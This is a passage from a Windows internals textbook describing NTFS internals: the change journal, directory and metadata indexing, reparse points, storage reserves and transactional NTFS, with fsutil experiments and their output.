the associated integrity stream has been updated
with a new checksum. This Identifier is generated
by the ReFS file system.
USN_REASON
_DESIRED_ST
ORAGE_CLAS
S_CHANGE
The event is generated by the NTFS file system
driver when a stream is moved from the capacity to
the performance tier or vice versa.
EXPERIMENT: Reading the change journal
You can use the built-in %SystemRoot%\System32\Fsutil.exe tool
to create, delete, or query journal information with the built-in
Fsutil.exe utility, as shown here:
Click here to view code image
d:\>fsutil usn queryjournal d:
Usn Journal ID : 0x01d48f4c3853cc72
First Usn : 0x0000000000000000
Next Usn : 0x0000000000000a60
Lowest Valid Usn : 0x0000000000000000
Max Usn : 0x7fffffffffff0000
Maximum Size : 0x0000000000a00000
Allocation Delta : 0x0000000000200000
Minimum record version supported : 2
Maximum record version supported : 4
Write range tracking: Disabled
The output indicates the maximum size of the change journal on
the volume (10 MB) and its current state. As a simple experiment
to see how NTFS records changes in the journal, create a file called
Usn.txt in the current directory, rename it to UsnNew.txt, and then
dump the journal with Fsutil, as shown here:
Click here to view code image
d:\>echo Hello USN Journal! > Usn.txt
d:\>ren Usn.txt UsnNew.txt
d:\>fsutil usn readjournal d:
...
Usn : 2656
File name : Usn.txt
File name length : 14
Reason : 0x00000100: File create
Time stamp : 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
Usn : 2736
File name : Usn.txt
File name length : 14
Reason : 0x00000102: Data extend | File create
Time stamp : 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
Usn : 2816
File name : Usn.txt
File name length : 14
Reason : 0x80000102: Data extend | File create |
Close
Time stamp : 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
Usn : 2896
File name : Usn.txt
File name length : 14
Reason : 0x00001000: Rename: old name
Time stamp : 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
Usn : 2976
File name : UsnNew.txt
File name length : 20
Reason : 0x00002000: Rename: new name
Time stamp : 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
Usn : 3056
File name : UsnNew.txt
File name length : 20
Reason : 0x80002000: Rename: new name | Close
Time stamp : 12/8/2018 15:22:15
File attributes : 0x00000020: Archive
File ID : 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info : 0x00000000: *NONE*
Security ID : 0
Major version : 3
Minor version : 0
Record length : 96
The entries reflect the individual modification operations
involved in the operations underlying the command-line
operations. If the change journal isn’t enabled on a volume (this
happens especially on non-system volumes where no applications
have requested file change notification or the USN Journal
creation), you can easily create it with the following command (in
the example a 10-MB journal has been requested):
Click here to view code image
d:\ >fsutil usn createJournal d: m=10485760 a=2097152
The journal is sparse so that it never overflows; when the journal’s on-disk
size exceeds the maximum defined for the file, NTFS simply begins zeroing
the file data that precedes the window of change information having a size
equal to the maximum journal size, as shown in Figure 11-49. To prevent
constant resizing when an application is continuously exceeding the journal’s
size, NTFS shrinks the journal only when its size is twice an application-
defined value over the maximum configured size.
Figure 11-49 Change journal ($UsnJrnl) space allocation.
Indexing
In NTFS, a file directory is simply an index of file names—that is, a
collection of file names (along with their file record numbers) organized as a
B-tree. To create a directory, NTFS indexes the file name attributes of the
files in the directory. The MFT record for the root directory of a volume is
shown in Figure 11-50.
Figure 11-50 File name index for a volume’s root directory.
Conceptually, an MFT entry for a directory contains in its index root
attribute a sorted list of the files in the directory. For large directories,
however, the file names are actually stored in 4 KB, fixed-size index buffers
(which are the nonresident values of the index allocation attribute) that
contain and organize the file names. Index buffers implement a B-tree data
structure, which minimizes the number of disk accesses needed to find a
particular file, especially for large directories. The index root attribute
contains the first level of the B-tree (root subdirectories) and points to index
buffers containing the next level (more subdirectories, perhaps, or files).
Figure 11-50 shows only file names in the index root attribute and the
index buffers (file6, for example), but each entry in an index also contains the
record number in the MFT where the file is described and time stamp and file
size information for the file. NTFS duplicates the time stamps and file size
information from the file’s MFT record. This technique, which is used by
FAT and NTFS, requires updated information to be written in two places.
Even so, it’s a significant speed optimization for directory browsing because
it enables the file system to display each file’s time stamps and size without
opening every file in the directory.
The index allocation attribute maps the VCNs of the index buffer runs to
the LCNs that indicate where the index buffers reside on the disk, and the
bitmap attribute keeps track of which VCNs in the index buffers are in use
and which are free. Figure 11-50 shows one file entry per VCN (that is, per
cluster), but file name entries are actually packed into each cluster. Each 4
KB index buffer will typically contain about 20 to 30 file name entries
(depending on the lengths of the file names within the directory).
The B-tree data structure is a type of balanced tree that is ideal for
organizing sorted data stored on a disk because it minimizes the number of
disk accesses needed to find an entry. In the MFT, a directory’s index root
attribute contains several file names that act as indexes into the second level
of the B-tree. Each file name in the index root attribute has an optional
pointer associated with it that points to an index buffer. The index buffer
points to containing file names with lexicographic values less than its own. In
Figure 11-50, for example, file4 is a first-level entry in the B-tree. It points to
an index buffer containing file names that are (lexicographically) less than
itself—the file names file0, file1, and file3. Note that the names file1, file3,
and so on that are used in this example are not literal file names but names
intended to show the relative placement of files that are lexicographically
ordered according to the displayed sequence.
Storing the file names in B-trees provides several benefits. Directory
lookups are fast because the file names are stored in a sorted order. And
when higher-level software enumerates the files in a directory, NTFS returns
already-sorted names. Finally, because B-trees tend to grow wide rather than
deep, NTFS’s fast lookup times don’t degrade as directories grow.
NTFS also provides general support for indexing data besides file names,
and several NTFS features—including object IDs, quota tracking, and
consolidated security—use indexing to manage internal data.
The B-tree indexes are a generic capability of NTFS and are used for
organizing security descriptors, security IDs, object IDs, disk quota records,
and reparse points. Directories are referred to as file name indexes, whereas
other types of indexes are known as view indexes.
Object IDs
In addition to storing the object ID assigned to a file or directory in the
$OBJECT_ID attribute of its MFT record, NTFS also keeps the
correspondence between object IDs and their file record numbers in the $O
index of the \$Extend\$ObjId metadata file. The index collates entries by
object ID (which is a GUID), making it easy for NTFS to quickly locate a file
based on its ID. This feature allows applications, using the NtCreateFile
native API with the FILE_OPEN_BY_FILE_ID flag, to open a file or
directory using its object ID. Figure 11-51 demonstrates the correspondence
of the $ObjId metadata file and $OBJECT_ID attributes in MFT records.
Figure 11-51 $ObjId and $OBJECT_ID relationships.
Quota tracking
NTFS stores quota information in the \$Extend\$Quota metadata file, which
consists of the named index root attributes $O and $Q. Figure 11-52 shows
the organization of these indexes. Just as NTFS assigns each security
descriptor a unique internal security ID, NTFS assigns each user a unique
user ID. When an administrator defines quota information for a user, NTFS
allocates a user ID that corresponds to the user’s SID. In the $O index, NTFS
creates an entry that maps an SID to a user ID and sorts the index by SID; in
the $Q index, NTFS creates a quota control entry. A quota control entry
contains the value of the user’s quota limits, as well as the amount of disk
space the user consumes on the volume.
Figure 11-52 $Quota indexing.
When an application creates a file or directory, NTFS obtains the
application user’s SID and looks up the associated user ID in the $O index.
NTFS records the user ID in the new file or directory’s
$STANDARD_INFORMATION attribute, which counts all disk space
allocated to the file or directory against that user’s quota. Then NTFS looks
up the quota entry in the $Q index and determines whether the new allocation
causes the user to exceed his or her warning or limit threshold. When a new
allocation causes the user to exceed a threshold, NTFS takes appropriate
steps, such as logging an event to the System event log or not letting the user
create the file or directory. As a file or directory changes size, NTFS updates
the quota control entry associated with the user ID stored in the
$STANDARD_INFORMATION attribute. NTFS uses the NTFS generic B-
tree indexing to efficiently correlate user IDs with account SIDs and, given a
user ID, to efficiently look up a user’s quota control information.
Consolidated security
NTFS has always supported security, which lets an administrator specify
which users can and can’t access individual files and directories. NTFS
optimizes disk utilization for security descriptors by using a central metadata
file named $Secure to store only one instance of each security descriptor on a
volume.
The $Secure file contains two index attributes—$SDH (Security
Descriptor Hash) and $SII (Security ID Index)—and a data-stream attribute
named $SDS (Security Descriptor Stream), as Figure 11-53 shows. NTFS
assigns every unique security descriptor on a volume an internal NTFS
security ID (not to be confused with a Windows SID, which uniquely
identifies computers and user accounts) and hashes the security descriptor
according to a simple hash algorithm. A hash is a potentially nonunique
shorthand representation of a descriptor. Entries in the $SDH index map the
security descriptor hashes to the security descriptor’s storage location within
the $SDS data attribute, and the $SII index entries map NTFS security IDs to
the security descriptor’s location in the $SDS data attribute.
Figure 11-53 $Secure indexing.
When you apply a security descriptor to a file or directory, NTFS obtains a
hash of the descriptor and looks through the $SDH index for a match. NTFS
sorts the $SDH index entries according to the hash of their corresponding
security descriptor and stores the entries in a B-tree. If NTFS finds a match
for the descriptor in the $SDH index, NTFS locates the offset of the entry’s
security descriptor from the entry’s offset value and reads the security
descriptor from the $SDS attribute. If the hashes match but the security
descriptors don’t, NTFS looks for another matching entry in the $SDH index.
When NTFS finds a precise match, the file or directory to which you’re
applying the security descriptor can reference the existing security descriptor
in the $SDS attribute. NTFS makes the reference by reading the NTFS
security identifier from the $SDH entry and storing it in the file or directory’s
$STANDARD_INFORMATION attribute. The NTFS
$STANDARD_INFORMATION attribute, which all files and directories
have, stores basic information about a file, including its attributes, time stamp
information, and security identifier.
If NTFS doesn’t find in the $SDH index an entry that has a security
descriptor that matches the descriptor you’re applying, the descriptor you’re
applying is unique to the volume, and NTFS assigns the descriptor a new
internal security ID. NTFS internal security IDs are 32-bit values, whereas
SIDs are typically several times larger, so representing SIDs with NTFS
security IDs saves space in the $STANDARD_INFORMATION attribute.
NTFS then adds the security descriptor to the end of the $SDS data attribute,
and it adds to the $SDH and $SII indexes entries that reference the
descriptor’s offset in the $SDS data.
When an application attempts to open a file or directory, NTFS uses the
$SII index to look up the file or directory’s security descriptor. NTFS reads
the file or directory’s internal security ID from the MFT entry’s
$STANDARD_INFORMATION attribute. It then uses the $Secure file’s
$SII index to locate the ID’s entry in the $SDS data attribute. The offset into
the $SDS attribute lets NTFS read the security descriptor and complete the
security check. NTFS stores the 32 most recently accessed security
descriptors with their $SII index entries in a cache so that it accesses the
$Secure file only when the $SII isn’t cached.
NTFS doesn’t delete entries in the $Secure file, even if no file or directory
on a volume references the entry. Not deleting these entries doesn’t
significantly decrease disk space because most volumes, even those used for
long periods, have relatively few unique security descriptors.
NTFS’s use of generic B-tree indexing lets files and directories that have
the same security settings efficiently share security descriptors. The $SII
index lets NTFS quickly look up a security descriptor in the $Secure file
while performing security checks, and the $SDH index lets NTFS quickly
determine whether a security descriptor being applied to a file or directory is
already stored in the $Secure file and can be shared.
Reparse points
As described earlier in the chapter, a reparse point is a block of up to 16 KB
of application-defined reparse data and a 32-bit reparse tag that are stored in
the $REPARSE_POINT attribute of a file or directory. Whenever an
application creates or deletes a reparse point, NTFS updates the
\$Extend\$Reparse metadata file, in which NTFS stores entries that identify
the file record numbers of files and directories that contain reparse points.
Storing the records in a central location enables NTFS to provide interfaces
for applications to enumerate all a volume’s reparse points or just specific
types of reparse points, such as mount points. The \$Extend\$Reparse file
uses the generic B-tree indexing facility of NTFS by collating the file’s
entries (in an index named $R) by reparse point tags and file record numbers.
EXPERIMENT: Looking at different reparse points
A file or directory reparse point can contain any kind of arbitrary
data. In this experiment, we use the built-in fsutil.exe tool to
analyze the reparse point content of a symbolic link and of a
Modern application’s AppExecutionAlias, similar to the
experiment in Chapter 8. First you need to create a symbolic link:
Click here to view code image
C:\>mklink test_link.txt d:\Test.txt
symbolic link created for test_link.txt <<===>> d:\Test.txt
Then you can use the fsutil reparsePoint query command to
examine the reparse point content:
Click here to view code image
C:\>fsutil reparsePoint query test_link.txt
Reparse Tag Value : 0xa000000c
Tag value: Microsoft
Tag value: Name Surrogate
Tag value: Symbolic Link
Reparse Data Length: 0x00000040
Reparse Data:
0000: 16 00 1e 00 00 00 16 00 00 00 00 00 64 00 3a 00
............d.:.
0010: 5c 00 54 00 65 00 73 00 74 00 2e 00 74 00 78 00
\.T.e.s.t...t.x.
0020: 74 00 5c 00 3f 00 3f 00 5c 00 64 00 3a 00 5c 00
t.\.?.?.\.d.:.\.
0030: 54 00 65 00 73 00 74 00 2e 00 74 00 78 00 74 00
T.e.s.t...t.x.t.
As expected, the content is a simple data structure
(REPARSE_DATA_BUFFER, documented in Microsoft Docs),
which contains the symbolic link target and the printed file name.
You can even delete the reparse point by using fsutil reparsePoint
delete command:
Click here to view code image
C:\>more test_link.txt
This is a test file!
C:\>fsutil reparsePoint delete test_link.txt
C:\>more test_link.txt
If you delete the reparse point, the file become a 0 bytes file.
This is by design because the unnamed data stream ($DATA) in
the link file is empty. You can repeat the experiment with an
AppExecutionAlias of an installed Modern application (in the
following example, Spotify was used):
Click here to view code image
C:\>cd C:\Users\Andrea\AppData\Local\Microsoft\WindowsApps
C:\Users\andrea\AppData\Local\Microsoft\WindowsApps>fsutil
reparsePoint query Spotify.exe
Reparse Tag Value : 0x8000001b
Tag value: Microsoft
Reparse Data Length: 0x00000178
Reparse Data:
0000: 03 00 00 00 53 00 70 00 6f 00 74 00 69 00 66 00
....S.p.o.t.i.f.
0010: 79 00 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00
y.A.B...S.p.o.t.
0020: 69 00 66 00 79 00 4d 00 75 00 73 00 69 00 63 00
i.f.y.M.u.s.i.c.
0030: 5f 00 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00
_.z.p.d.n.e.k.d.
0040: 72 00 7a 00 72 00 65 00 61 00 30 00 00 00 53 00
r.z.r.e.a.0...S
0050: 70 00 6f 00 74 00 69 00 66 00 79 00 41 00 42 00
p.o.t.i.f.y.A.B.
0060: 2e 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00
..S.p.o.t.i.f.y.
0070: 4d 00 75 00 73 00 69 00 63 00 5f 00 7a 00 70 00
M.u.s.i.c._.z.p.
0080: 64 00 6e 00 65 00 6b 00 64 00 72 00 7a 00 72 00
d.n.e.k.d.r.z.r.
0090: 65 00 61 00 30 00 21 00 53 00 70 00 6f 00 74 00
e.a.0.!.S.p.o.t.
00a0: 69 00 66 00 79 00 00 00 43 00 3a 00 5c 00 50 00
i.f.y...C.:.\.P.
00b0: 72 00 6f 00 67 00 72 00 61 00 6d 00 20 00 46 00
r.o.g.r.a.m. .F.
00c0: 69 00 6c 00 65 00 73 00 5c 00 57 00 69 00 6e 00
i.l.e.s.\.W.i.n.
00d0: 64 00 6f 00 77 00 73 00 41 00 70 00 70 00 73 00
d.o.w.s.A.p.p.s.
00e0: 5c 00 53 00 70 00 6f 00 74 00 69 00 66 00 79 00
\.S.p.o.t.i.f.y.
00f0: 41 00 42 00 2e 00 53 00 70 00 6f 00 74 00 69 00
A.B...S.p.o.t.i.
0100: 66 00 79 00 4d 00 75 00 73 00 69 00 63 00 5f 00
f.y.M.u.s.i.c._.
0110: 31 00 2e 00 39 00 34 00 2e 00 32 00 36 00 32 00
1...9.4...2.6.2.
0120: 2e 00 30 00 5f 00 78 00 38 00 36 00 5f 00 5f 00
..0._.x.8.6._._.
0130: 7a 00 70 00 64 00 6e 00 65 00 6b 00 64 00 72 00
z.p.d.n.e.k.d.r.
0140: 7a 00 72 00 65 00 61 00 30 00 5c 00 53 00 70 00
z.r.e.a.0.\.S.p.
0150: 6f 00 74 00 69 00 66 00 79 00 4d 00 69 00 67 00
o.t.i.f.y.M.i.g.
0160: 72 00 61 00 74 00 6f 00 72 00 2e 00 65 00 78 00
r.a.t.o.r...e.x.
0170: 65 00 00 00 30 00 00 00
e...0...
From the preceding output, we can see another kind of reparse
point, the AppExecutionAlias, used by Modern applications. More
information is available in Chapter 8.
Storage reserves and NTFS reservations
Windows Update and the Windows Setup application must be able to
correctly apply important security updates, even when the system volume is
almost full (they need to ensure that there is enough disk space). Windows 10
introduced Storage Reserves as a way to achieve this goal. Before we
describe the Storage Reserves, it is necessary that you understand how NTFS
reservations work and why they’re needed.
When the NTFS file system mounts a volume, it calculates the volume’s
in-use and free space. No on-disk attributes exist for keeping track of these
two counters; NTFS maintains and stores the Volume bitmap on disk, which
represents the state of all the clusters in the volume. The NTFS mounting
code scans the bitmap and counts the number of used clusters, which have
their bit set to 1 in the bitmap, and, through a simple equation (total number
of clusters of the volume minus the number of used ones), calculates the
number of free clusters. The two calculated counters are stored in the volume
control block (VCB) data structure, which represents the mounted volume
and exists only in memory until the volume is dismounted.
During normal volume I/O activity, NTFS must maintain the total number
of reserved clusters. This counter needs to exist for the following reasons:
■ When writing to compressed and sparse files, the system must ensure
that the entire file is writable because an application that is operating
on this kind of file could potentially store valid uncompressed data on
the entire file.
■ The first time a writable image-backed section is created, the file
system must reserve available space for the entire section size, even if
no physical space is still allocated in the volume.
■ The USN Journal and TxF use the counter to ensure that there is space
available for the USN log and NTFS transactions.
NTFS maintains another counter during normal I/O activities, Total Free
Available Space, which is the final space that a user can see and use for
storing new files or data. These three concepts are parts of NTFS
Reservations. The important characteristic of NTFS Reservations is that the
counters are only in-memory volatile representations, which will be
destroyed at volume dismounting time.
Storage Reserve is a feature based on NTFS reservations, which allow files
to have an assigned Storage Reserve area. Storage Reserve defines 15
different reservation areas (2 of which are reserved by the OS), which are
defined and stored both in memory and in the NTFS on-disk data structures.
To use the new on-disk reservations, an application defines a volume’s
Storage Reserve area by using the FSCTL_QUERY_STORAGE_RESERVE
file system control code, which specifies, through a data structure, the total
amount of reserved space and an Area ID. This will update multiple counters
in the VCB (Storage Reserve areas are maintained in-memory) and insert
new data in the $SRAT named data stream of the $Bitmap metadata file. The
$SRAT data stream contains a data structure that tracks each Reserve area,
including the number of reserved and used clusters. An application can query
information about Storage Reserve areas through the
FSCTL_QUERY_STORAGE_RESERVE file system control code and can
delete a Storage Reserve using the FSCTL_DELETE_STORAGE_RESERVE
code.
After a Storage Reserve area is defined, the application is guaranteed that
the space will no longer be used by any other components. Applications can
then assign files and directories to a Storage Reserve area using the
NtSetInformationFile native API with the
FileStorageReserveIdInformationEx information class. The NTFS file system
driver manages the request by updating the in-memory reserved and used
clusters counters of the Reserve area, and by updating the volume’s total
number of reserved clusters that belong to NTFS reservations. It also stores
and updates the on-disk $STANDARD_INFO attribute of the target file. The
latter maintains 4 bits to store the Storage Reserve area ID. In this way, the
system is able to quickly enumerate each file that belongs to a reserve area by
just parsing MFT entries. (NTFS implements the enumeration in the
FSCTL_QUERY_FILE_LAYOUT code’s dispatch function.) A user can
enumerate the files that belong to a Storage Reserve by using the fsutil
storageReserve findByID command, specifying the volume path name and
Storage Reserve ID she is interested in.
Several basic file operations have new side effects due to Storage
Reserves, like file creation and renaming. Newly created files or directories
will automatically inherit the storage reserve ID of their parent; the same
applies for files or directories that get renamed (moved) to a new parent.
Since a rename operation can change the Storage Reserve ID of the file or
directory, this implies that the operation might fail due to lack of disk space.
Moving a nonempty directory to a new parent implies that the new Storage
Reserve ID is recursively applied to all the files and subdirectories. When the
reserved space of a Storage Reserve ends, the system starts to use the
volume’s free available space, so there is no guarantee that the operation
always succeeds.
EXPERIMENT: Witnessing storage reserves
Starting from the May 2019 Update of Windows 10 (19H1), you
can look at the existing NTFS reserves through the built-in
fsutil.exe tool:
Click here to view code image
C:\>fsutil storagereserve query c:
Reserve ID: 1
Flags: 0x00000000
Space Guarantee: 0x0 (0 MB)
Space Used: 0x0 (0 MB)
Reserve ID: 2
Flags: 0x00000000
Space Guarantee: 0x0 (0 MB)
Space Used: 0x199ed000 (409 MB)
Windows Setup defines two NTFS reserves: a Hard reserve (ID
1), used by the Setup application to store its files, which can’t be
deleted or replaced by other applications, and a Soft reserve (ID 2),
which is used to store temporary files, like system logs and
Windows Update downloaded files. In the preceding example, the
Setup application has been already able to install all its files (and
no Windows Update is executing), so the Hard Reserve is empty;
the Soft reserve has all its reserved space allocated. You can
enumerate all the files that belong to the reserve using the fsutil
storagereserve findById command. (Be aware that the output is
very large, so you might consider redirecting the output to a file
using the > operator.)
Click here to view code image
C:\>fsutil storagereserve findbyid c: 2
...
********* File 0x0002000000018762 *********
File reference number : 0x0002000000018762
File attributes : 0x00000020: Archive
File entry flags : 0x00000000
Link (ParentID: Name) : 0x0001000000001165: NTFS Name :
Windows\System32\winevt\Logs\OAlerts.evtx
Link (ParentID: Name) : 0x0001000000001165: DOS Name :
OALERT~1.EVT
Creation Time : 12/9/2018 3:26:55
Last Access Time : 12/10/2018 0:21:57
Last Write Time : 12/10/2018 0:21:57
Change Time : 12/10/2018 0:21:57
LastUsn : 44,846,752
OwnerId : 0
SecurityId : 551
StorageReserveId : 2
Stream : 0x010 ::$STANDARD_INFORMATION
Attributes : 0x00000000: *NONE*
Flags : 0x0000000c: Resident | No clusters
allocated
Size : 72
Allocated Size : 72
Stream : 0x030 ::$FILE_NAME
Attributes : 0x00000000: *NONE*
Flags : 0x0000000c: Resident | No clusters
allocated
Size : 90
Allocated Size : 96
Stream : 0x030 ::$FILE_NAME
Attributes : 0x00000000: *NONE*
Flags : 0x0000000c: Resident | No clusters
allocated
Size : 90
Allocated Size : 96
Stream : 0x080 ::$DATA
Attributes : 0x00000000: *NONE*
Flags : 0x00000000: *NONE*
Size : 69,632
Allocated Size : 69,632
Extents : 1 Extents
: 1: VCN: 0 Clusters: 17 LCN:
3,820,235
Transaction support
By leveraging the Kernel Transaction Manager (KTM) support in the kernel,
as well as the facilities provided by the Common Log File System, NTFS
implements a transactional model called transactional NTFS or TxF. TxF
provides a set of user-mode APIs that applications can use for transacted
operations on their files and directories and also a file system control
(FSCTL) interface for managing its resource managers.
Note
Windows Vista added the support for TxF as a means to introduce atomic
transactions to Windows. The NTFS driver was modified without actually
changing the format of the NTFS data structures, which is why the NTFS
format version number, 3.1, is the same as it has been since Windows XP
and Windows Server 2003. TxF achieves backward compatibility by
reusing the attribute type ($LOGGED_UTILITY_STREAM) that was
previously used only for EFS support instead of adding a new one.
TxF is a powerful API, but due to its complexity and various issues that
developers need to consider, they have been adopted by a low number of
applications. At the time of this writing, Microsoft is considering deprecating
TxF APIs in a future version of Windows. For the sake of completeness, we
present only a general overview of the TxF architecture in this book.
The overall architecture for TxF, shown in Figure 11-54, uses several
components:
■ Transacted APIs implemented in the Kernel32.dll library
■ A library for reading TxF logs
(%SystemRoot%\System32\Txfw32.dll)
■ A COM component for TxF logging functionality
(%SystemRoot\System32\Txflog.dll)
■ The transactional NTFS library inside the NTFS driver
■ The CLFS infrastructure for reading and writing log records
Figure 11-54 TxF architecture.
Isolation
Although transactional file operations are opt-in, just like the transactional
registry (TxR) operations described in Chapter 10, TxF has an effect on
regular applications that are not transaction-aware because it ensures that the
transactional operations are isolated. For example, if an antivirus program is
scanning a file that’s currently being modified by another application via a
transacted operation, TxF must ensure that the scanner reads the
pretransaction data, while applications that access the file within the
transaction work with the modified data. This model is called read-committed
isolation.
Read-committed isolation involves the concept of transacted writers and
transacted readers. The former always view the most up-to-date version of a
file, including all changes made by the transaction that is currently associated
with the file. At any given time, there can be only one transacted writer for a
file, which means that its write access is exclusive. Transacted readers, on the
other hand, have access only to the committed version of the file at the time
they open the file. They are therefore isolated from changes made by
transacted writers. This allows for readers to have a consistent view of a file,
even when a transacted writer commits its changes. To see the updated data,
the transacted reader must open a new handle to the modified file.
Nontransacted writers, on the other hand, are prevented from opening the
file by both transacted writers and transacted readers, so they cannot make
changes to the file without being part of the transaction. Nontransacted
readers act similarly to transacted readers in that they see only the file
contents that were last committed when the file handle was open. Unlike
transacted readers, however, they do not receive read-committed isolation,
and as such they always receive the updated view of the latest committed
version of a transacted file without having to open a new file handle. This
allows non-transaction-aware applications to behave as expected.
To summarize, TxF’s read-committed isolation model has the following
characteristics:
■ Changes are isolated from transacted readers.
■ Changes are rolled back (undone) if the associated transaction is
rolled back, if the machine crashes, or if the volume is forcibly
dismounted.
■ Changes are flushed to disk if the associated transaction is committed.
Transactional APIs
TxF implements transacted versions of the Windows file I/O APIs, which use
the suffix Transacted:
■ Create APIs CreateDirectoryTransacted, CreateFileTransacted,
CreateHardLinkTransacted, CreateSymbolicLinkTransacted
■ Find APIs FindFirstFileNameTransacted, FindFirstFileTransacted,
FindFirstStreamTransacted
■ Query APIs GetCompressedFileSizeTransacted,
GetFileAttributesTransacted, GetFullPathNameTransacted,
GetLongPathNameTransacted
■ Delete APIs DeleteFileTransacted, RemoveDirectoryTransacted
■ Copy and Move/Rename APIs CopyFileTransacted,
MoveFileTransacted
■ Set APIs SetFileAttributesTransacted
In addition, some APIs automatically participate in transacted operations
when the file handle they are passed is part of a transaction, like one created
by the CreateFileTransacted API. Table 11-10 lists Windows APIs that have
modified behavior when dealing with a transacted file handle.
Table 11-10 API behavior changed by TxF
API Name
Change
CloseHandle
Transactions aren’t committed until all
applications close transacted handles to the file.
CreateFileMapping,
MapViewOfFile
Modifications to mapped views of a file part of a
transaction are associated with the transaction
themselves.
FindNextFile,
ReadDirectoryChan
ges,
GetInformationByH
andle, GetFileSize
If the file handle is part of a transaction, read-
isolation rules are applied to these operations.
GetVolumeInformati
on
Function returns
FILE_SUPPORTS_TRANSACTIONS if the
volume supports TxF.
ReadFile, WriteFile
Read and write operations to a transacted file
handle are part of the transaction.
SetFileInformationB
yHandle
Changes to the FileBasicInfo, FileRenameInfo,
FileAllocationInfo, FileEndOfFileInfo, and
FileDispositionInfo classes are transacted if the
file handle is part of a transaction.
SetEndOfFile,
SetFileShortName,
SetFileTime
Changes are transacted if the file handle is part
of a transaction.
On-disk implementation
As shown earlier in Table 11-7, TxF uses the
$LOGGED_UTILITY_STREAM attribute type to store additional data for
files and directories that are or have been part of a transaction. This attribute
is called $TXF_DATA and contains important information that allows TxF to
keep active offline data for a file part of a transaction. The attribute is
permanently stored in the MFT; that is, even after the file is no longer part of
a transaction, the stream remains, for reasons explained soon. The major
components of the attribute are shown in Figure 11-55.
Figure 11-55 $TXF_DATA attribute.
The first field shown is the file record number of the root of the resource
manager responsible for the transaction associated with this file. For the
default resource manager, the file record number is 5, which is the file record
number for the root directory (\) in the MFT, as shown earlier in Figure 11-
31. TxF needs this information when it creates an FCB for the file so that it
can link it to the correct resource manager, which in turn needs to create an
enlistment for the transaction when a transacted file request is received by
NTFS.
Another important piece of data stored in the $TXF_DATA attribute is the
TxF file ID, or TxID, and this explains why $TXF_DATA attributes are
never deleted. Because NTFS writes file names to its records when writing to
the transaction log, it needs a way to uniquely identify files in the same
directory that may have had the same name. For example, if sample.txt is
deleted from a directory in a transaction and later a new file with the same
name is created in the same directory (and as part of the same transaction),
TxF needs a way to uniquely identify the two instances of sample.txt. This
identification is provided by a 64-bit unique number, the TxID, that TxF
increments when a new file (or an instance of a file) becomes part of a
transaction. Because they can never be reused, TxIDs are permanent, so the
$TXF_DATA attribute will never be removed from a file.
Last but not least, three CLFS (Common Logging File System) LSNs are
stored for each file part of a transaction. Whenever a transaction is active,
such as during create, rename, or write operations, TxF writes a log record to
its CLFS log. Each record is assigned an LSN, and that LSN gets written to
the appropriate field in the $TXF_DATA attribute. The first LSN is used to
store the log record that identifies the changes to NTFS metadata in relation
to this file. For example, if the standard attributes of a file are changed as part
of a transacted operation, TxF must update the relevant MFT file record, and
the LSN for the log record describing the change is stored. TxF uses the
second LSN when the file’s data is modified. Finally, TxF uses the third LSN
when the file name index for the directory requires a change related to a
transaction the file took part in, or when a directory was part of a transaction
and received a TxID.
The $TXF_DATA attribute also stores internal flags that describe the state
information to TxF and the index of the USN record that was applied to the
file on commit. A TxF transaction can span multiple USN records that may
have been partly updated by NTFS’s recovery mechanism (described
shortly), so the index tells TxF how many more USN records must be applied
after a recovery.
TxF uses a default resource manager, one for each volume, to keep track
of its transactional state. TxF, however, also supports additional resource
managers called secondary resource managers. These resource managers can
be defined by application writers and have their metadata located in any
directory of the application’s choosing, defining their own transactional work
units for undo, backup, restore, and redo operations. Both the default
resource manager and secondary resource managers contain a number of
metadata files and directories that describe their current state:
■ The $Txf directory, located into $Extend\$RmMetadata directory,
which is where files are linked when they are deleted or overwritten
by transactional operations.
■ The $Tops, or TxF Old Page Stream (TOPS) file, which contains a
default data stream and an alternate data stream called $T. The default
stream for the TOPS file contains metadata about the resource
manager, such as its GUID, its CLFS log policy, and the LSN at
which recovery should start. The $T stream contains file data that is
partially overwritten by a transactional writer (as opposed to a full
overwrite, which would move the file into the $Txf directory).
■ The TxF log files, which are CLFS log files storing transaction
records. For the default resource manager, these files are part of the
$TxfLog directory, but secondary resource managers can store them
anywhere. TxF uses a multiplexed base log file called $TxfLog.blf.
The file \$Extend\$RmMetadata\$TxfLog\$TxfLog contains two
streams: the KtmLog stream used for Kernel Transaction Manager
metadata records, and the TxfLog stream, which contains the TxF log
records.
EXPERIMENT: Querying resource manager
information
You can use the built-in Fsutil.exe command-line program to query
information about the default resource manager as well as to create,
start, and stop secondary resource managers and configure their
logging policies and behaviors. The following command queries
information about the default resource manager, which is identified
by the root directory (\):
Click here to view code image
d:\>fsutil resource info \
Resource Manager Identifier : 81E83020-E6FB-11E8-B862-
D89EF33A38A7
KTM Log Path for RM:
\Device\HarddiskVolume8\$Extend\$RmMetadata\$TxfLog\$TxfLog:
:KtmLog
Space used by TOPS: 1 Mb
TOPS free space: 100%
RM State: Active
Running transactions: 0
One phase commits: 0
Two phase commits: 0
System initiated rollbacks: 0
Age of oldest transaction: 00:00:00
Logging Mode: Simple
Number of containers: 2
Container size: 10 Mb
Total log capacity: 20 Mb
Total free log space: 19 Mb
Minimum containers: 2
Maximum containers: 20
Log growth increment: 2 container(s)
Auto shrink: Not enabled
